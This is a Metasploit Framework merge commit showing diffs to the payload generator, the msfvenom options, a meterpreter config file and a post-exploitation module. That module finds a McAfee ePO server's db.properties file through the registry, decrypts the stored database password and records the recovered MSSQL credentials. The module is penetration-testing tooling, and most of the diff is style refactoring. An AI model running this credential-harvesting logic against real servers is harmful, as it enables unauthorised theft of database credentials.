Merge branch 'master' of git://github.com/rapid7/metasploit-framework
Samuel Huckins
commit
c0b0a95d95
|
|
@ -64,6 +64,9 @@ module Msf
|
|||
# @!attribute space
|
||||
# @return [Fixnum] The maximum size in bytes of the payload
|
||||
attr_accessor :space
|
||||
# @!attribute encoder_space
|
||||
# @return [Fixnum] The maximum size in bytes of the encoded payload
|
||||
attr_accessor :encoder_space
|
||||
# @!attribute stdin
|
||||
# @return [String] The raw bytes of a payload taken from STDIN
|
||||
attr_accessor :stdin
|
||||
|
|
@ -85,6 +88,7 @@ module Msf
|
|||
# @option opts [String] :badchars (see #badchars)
|
||||
# @option opts [String] :template (see #template)
|
||||
# @option opts [Fixnum] :space (see #space)
|
||||
# @option opts [Fixnum] :encoder_space (see #encoder_space)
|
||||
# @option opts [Fixnum] :nops (see #nops)
|
||||
# @option opts [String] :add_code (see #add_code)
|
||||
# @option opts [Boolean] :keep (see #keep)
|
||||
|
|
@ -109,6 +113,7 @@ module Msf
|
|||
@stdin = opts.fetch(:stdin, nil)
|
||||
@template = opts.fetch(:template, '')
|
||||
@var_name = opts.fetch(:var_name, 'buf')
|
||||
@encoder_space = opts.fetch(:encoder_space, @space)
|
||||
|
||||
@framework = opts.fetch(:framework)
|
||||
|
||||
|
|
@ -200,7 +205,7 @@ module Msf
|
|||
encoder_list.each do |encoder_mod|
|
||||
cli_print "Attempting to encode payload with #{iterations} iterations of #{encoder_mod.refname}"
|
||||
begin
|
||||
encoder_mod.available_space = @space
|
||||
encoder_mod.available_space = @encoder_space
|
||||
return run_encoder(encoder_mod, shellcode.dup)
|
||||
rescue ::Msf::EncoderSpaceViolation => e
|
||||
cli_print "#{encoder_mod.refname} failed with #{e.message}"
|
||||
|
|
@ -395,7 +400,7 @@ module Msf
|
|||
iterations.times do |x|
|
||||
shellcode = encoder_module.encode(shellcode.dup, badchars, nil, platform_list)
|
||||
cli_print "#{encoder_module.refname} succeeded with size #{shellcode.length} (iteration=#{x})"
|
||||
if shellcode.length > space
|
||||
if shellcode.length > encoder_space
|
||||
raise EncoderSpaceViolation, "encoder has made a buffer that is too big"
|
||||
end
|
||||
end
|
||||
|
|
|
|||
|
|
@ -39,7 +39,7 @@ private
|
|||
end
|
||||
|
||||
def to_wchar_t(item, size)
|
||||
to_ascii(item, size).unpack("C*").pack("v*")
|
||||
to_ascii(item, size).unpack('C*').pack('v*')
|
||||
end
|
||||
|
||||
def to_ascii(item, size)
|
||||
|
|
@ -57,7 +57,7 @@ private
|
|||
uuid # the UUID
|
||||
]
|
||||
|
||||
session_data.pack("VVVA*")
|
||||
session_data.pack('VVVA*')
|
||||
end
|
||||
|
||||
def transport_block(opts)
|
||||
|
|
@ -117,7 +117,7 @@ private
|
|||
ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
|
||||
file_extension))
|
||||
|
||||
extension_data = [ ext.length, ext ].pack("VA*")
|
||||
extension_data = [ ext.length, ext ].pack('VA*')
|
||||
end
|
||||
|
||||
def config_block
|
||||
|
|
@ -143,9 +143,9 @@ private
|
|||
|
||||
# terminate the extensions with a 0 size
|
||||
if is_x86?
|
||||
config << [0].pack("V")
|
||||
config << [0].pack('V')
|
||||
else
|
||||
config << [0].pack("Q")
|
||||
config << [0].pack('Q<')
|
||||
end
|
||||
|
||||
# and we're done
|
||||
|
|
|
|||
|
|
@ -5,7 +5,7 @@
|
|||
|
||||
require 'msf/core'
|
||||
require 'rex'
|
||||
require "net/dns/resolver"
|
||||
require 'net/dns/resolver'
|
||||
require 'msf/core/auxiliary/report'
|
||||
|
||||
class Metasploit3 < Msf::Post
|
||||
|
|
@ -30,20 +30,20 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
def run
|
||||
# Find out where things are installed
|
||||
print_status("Finding Tomcat install path...")
|
||||
subkeys = registry_enumkeys("HKLM\\Software\\Network Associates\\ePolicy Orchestrator")
|
||||
print_status('Finding Tomcat install path...')
|
||||
subkeys = registry_enumkeys('HKLM\Software\Network Associates\ePolicy Orchestrator',REGISTRY_VIEW_32_BIT)
|
||||
if subkeys.nil? or subkeys.empty?
|
||||
print_error ("ePO 4.6 Not Installed or No Permissions to RegKey")
|
||||
print_error ('ePO 4.6 Not Installed or No Permissions to RegKey')
|
||||
return
|
||||
end
|
||||
# Get the db.properties file location
|
||||
epol_reg_key = "HKLM\\Software\\Network Associates\\ePolicy Orchestrator"
|
||||
dbprops_file = registry_getvaldata(epol_reg_key, "TomcatFolder")
|
||||
if dbprops_file == nil or dbprops_file == ""
|
||||
print_error("Could not find db.properties file location")
|
||||
epol_reg_key = 'HKLM\Software\Network Associates\ePolicy Orchestrator'
|
||||
dbprops_file = registry_getvaldata(epol_reg_key, 'TomcatFolder',REGISTRY_VIEW_32_BIT)
|
||||
if dbprops_file == nil or dbprops_file == ''
|
||||
print_error('Could not find db.properties file location')
|
||||
else
|
||||
dbprops_file << "/conf/orion/db.properties";
|
||||
print_good("Found db.properties location");
|
||||
dbprops_file << '/conf/orion/db.properties';
|
||||
print_good('Found db.properties location');
|
||||
process_config(dbprops_file);
|
||||
end
|
||||
end
|
||||
|
|
@ -57,39 +57,39 @@ class Metasploit3 < Msf::Post
|
|||
line.chomp
|
||||
line_array = line.split('=')
|
||||
case line_array[0]
|
||||
when "db.database.name"
|
||||
database_name = ""
|
||||
when 'db.database.name'
|
||||
database_name = ''
|
||||
line_array[1].each_byte { |x| database_name << x unless x > 126 || x < 32 }
|
||||
when "db.instance.name"
|
||||
database_instance = ""
|
||||
when 'db.instance.name'
|
||||
database_instance = ''
|
||||
line_array[1].each_byte { |x| database_instance << x unless x > 126 || x < 32 }
|
||||
when "db.user.domain"
|
||||
user_domain = ""
|
||||
when 'db.user.domain'
|
||||
user_domain = ''
|
||||
line_array[1].each_byte { |x| user_domain << x unless x > 126 || x < 32 }
|
||||
when "db.user.name"
|
||||
user_name = ""
|
||||
when 'db.user.name'
|
||||
user_name = ''
|
||||
line_array[1].each_byte { |x| user_name << x unless x > 126 || x < 32 }
|
||||
when "db.port"
|
||||
port = ""
|
||||
when 'db.port'
|
||||
port = ''
|
||||
line_array[1].each_byte { |x| port << x unless x > 126 || x < 32 }
|
||||
when "db.user.passwd.encrypted.ex"
|
||||
when 'db.user.passwd.encrypted.ex'
|
||||
# ePO 4.6 encrypted password
|
||||
passwd = ""
|
||||
passwd = ''
|
||||
line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 }
|
||||
passwd.gsub("\\","")
|
||||
passwd.gsub('\\','')
|
||||
# Add any Base64 padding that may have been stripped out
|
||||
passwd << "=" until ( passwd.length % 4 == 0 )
|
||||
passwd << '=' until ( passwd.length % 4 == 0 )
|
||||
plaintext_passwd = decrypt46(passwd)
|
||||
when "db.user.passwd.encrypted"
|
||||
when 'db.user.passwd.encrypted'
|
||||
# ePO 4.5 encrypted password - not currently supported, see notes below
|
||||
passwd = ""
|
||||
passwd = ''
|
||||
line_array[1].each_byte { |x| passwd << x unless x > 126 || x < 32 }
|
||||
passwd.gsub("\\","")
|
||||
passwd.gsub('\\','')
|
||||
# Add any Base64 padding that may have been stripped out
|
||||
passwd << "=" until ( passwd.length % 4 == 0 )
|
||||
plaintext_passwd = "PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP"
|
||||
when "db.server.name"
|
||||
database_server_name = ""
|
||||
passwd << '=' until ( passwd.length % 4 == 0 )
|
||||
plaintext_passwd = 'PASSWORD NOT RECOVERED - ePO 4.5 DECRYPT SUPPORT IS WIP'
|
||||
when 'db.server.name'
|
||||
database_server_name = ''
|
||||
line_array[1].each_byte { |x| database_server_name << x unless x > 126 || x < 32 }
|
||||
end
|
||||
end
|
||||
|
|
@ -98,7 +98,7 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
result = client.net.resolve.resolve_host(database_server_name)
|
||||
if result[:ip].nil? or result[:ip].empty?
|
||||
print_error("Could not determine IP of DB - credentials not added to report database")
|
||||
print_error('Could not determine IP of DB - credentials not added to report database')
|
||||
return
|
||||
end
|
||||
|
||||
|
|
@ -111,11 +111,11 @@ class Metasploit3 < Msf::Post
|
|||
print_good("Database IP: #{db_ip}")
|
||||
end
|
||||
print_good("Port: #{port}")
|
||||
if user_domain == nil or user_domain == ""
|
||||
print_good("Authentication Type: SQL");
|
||||
if user_domain == nil or user_domain == ''
|
||||
print_good('Authentication Type: SQL');
|
||||
full_user = user_name
|
||||
else
|
||||
print_good("Authentication Type: Domain");
|
||||
print_good('Authentication Type: Domain');
|
||||
print_good("Domain: #{user_domain}");
|
||||
full_user = "#{user_domain}\\#{user_name}"
|
||||
end
|
||||
|
|
@ -127,8 +127,8 @@ class Metasploit3 < Msf::Post
|
|||
service_data = {
|
||||
address: Rex::Socket.getaddress(db_ip),
|
||||
port: port,
|
||||
protocol: "tcp",
|
||||
service_name: "mssql",
|
||||
protocol: 'tcp',
|
||||
service_name: 'mssql',
|
||||
workspace_id: myworkspace_id
|
||||
}
|
||||
|
||||
|
|
@ -145,21 +145,21 @@ class Metasploit3 < Msf::Post
|
|||
|
||||
login_data = {
|
||||
core: credential_core,
|
||||
access_level: "User",
|
||||
access_level: 'User',
|
||||
status: Metasploit::Model::Login::Status::UNTRIED
|
||||
}
|
||||
|
||||
create_credential_login(login_data.merge(service_data))
|
||||
print_good("Added credentials to report database")
|
||||
print_good('Added credentials to report database')
|
||||
else
|
||||
print_error("Could not determine IP of DB - credentials not added to report database")
|
||||
print_error('Could not determine IP of DB - credentials not added to report database')
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def decrypt46(encoded)
|
||||
encrypted_data = Rex::Text.decode_base64(encoded)
|
||||
aes = OpenSSL::Cipher::Cipher.new("AES-128-ECB")
|
||||
aes = OpenSSL::Cipher::Cipher.new('AES-128-ECB')
|
||||
aes.padding = 0
|
||||
aes.decrypt
|
||||
# Private key extracted from ePO 4.6.0 Build 1029
|
||||
|
|
@ -172,6 +172,5 @@ class Metasploit3 < Msf::Post
|
|||
password.gsub!(/[^[:print:]]/,'')
|
||||
return password
|
||||
end
|
||||
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
39
msfvenom
39
msfvenom
|
|
@ -58,7 +58,8 @@ require 'msf/core/payload_generator'
|
|||
opt.separator('')
|
||||
opt.separator('Options:')
|
||||
|
||||
opt.on('-p', '--payload <payload>', String, 'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
|
||||
opt.on('-p', '--payload <payload>', String,
|
||||
'Payload to use. Specify a \'-\' or stdin to use custom payloads') do |p|
|
||||
if p == '-'
|
||||
opts[:payload] = 'stdin'
|
||||
else
|
||||
|
|
@ -66,7 +67,11 @@ require 'msf/core/payload_generator'
|
|||
end
|
||||
end
|
||||
|
||||
opt.on('-l', '--list [module_type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
|
||||
opt.on('--payload-options', "List the payload's standard options") do
|
||||
opts[:list_options] = true
|
||||
end
|
||||
|
||||
opt.on('-l', '--list [type]', Array, 'List a module type. Options are: payloads, encoders, nops, all') do |l|
|
||||
if l.nil? or l.empty?
|
||||
l = ["all"]
|
||||
end
|
||||
|
|
@ -81,11 +86,20 @@ require 'msf/core/payload_generator'
|
|||
opts[:format] = f
|
||||
end
|
||||
|
||||
opt.on('-e', '--encoder [encoder]', String, 'The encoder to use') do |e|
|
||||
opt.on('--help-formats', String, "List available formats") do
|
||||
init_framework(:module_types => [])
|
||||
msg = "Executable formats\n" +
|
||||
"\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
|
||||
"Transform formats\n" +
|
||||
"\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
|
||||
raise UsageError, msg
|
||||
end
|
||||
|
||||
opt.on('-e', '--encoder <encoder>', String, 'The encoder to use') do |e|
|
||||
opts[:encoder] = e
|
||||
end
|
||||
|
||||
opt.on('-a', '--arch <architecture>', String, 'The architecture to use') do |a|
|
||||
opt.on('-a', '--arch <arch>', String, 'The architecture to use') do |a|
|
||||
opts[:arch] = a
|
||||
end
|
||||
|
||||
|
|
@ -97,6 +111,10 @@ require 'msf/core/payload_generator'
|
|||
opts[:space] = s
|
||||
end
|
||||
|
||||
opt.on('--encoder-space <length>', Integer, 'The maximum size of the encoded payload (defaults to the -s value)') do |s|
|
||||
opts[:encoder_space] = s
|
||||
end
|
||||
|
||||
opt.on('-b', '--bad-chars <list>', String, 'The list of characters to avoid example: \'\x00\xff\'') do |b|
|
||||
opts[:badchars] = Rex::Text.hex_to_raw(b)
|
||||
end
|
||||
|
|
@ -117,10 +135,6 @@ require 'msf/core/payload_generator'
|
|||
opts[:keep] = true
|
||||
end
|
||||
|
||||
opt.on('--payload-options', "List the payload's standard options") do
|
||||
opts[:list_options] = true
|
||||
end
|
||||
|
||||
opt.on('-o', '--out <path>', 'Save the payload') do |x|
|
||||
opts[:out] = x
|
||||
end
|
||||
|
|
@ -133,15 +147,6 @@ require 'msf/core/payload_generator'
|
|||
raise UsageError, "#{opt}"
|
||||
end
|
||||
|
||||
opt.on_tail('--help-formats', String, "List available formats") do
|
||||
init_framework(:module_types => [])
|
||||
msg = "Executable formats\n" +
|
||||
"\t" + ::Msf::Util::EXE.to_executable_fmt_formats.join(", ") + "\n" +
|
||||
"Transform formats\n" +
|
||||
"\t" + ::Msf::Simple::Buffer.transform_formats.join(", ")
|
||||
raise UsageError, msg
|
||||
end
|
||||
|
||||
begin
|
||||
opt.parse!(args)
|
||||
rescue OptionParser::InvalidOption => e
|
||||
|
|
|
|||
Loading…
Reference in New Issue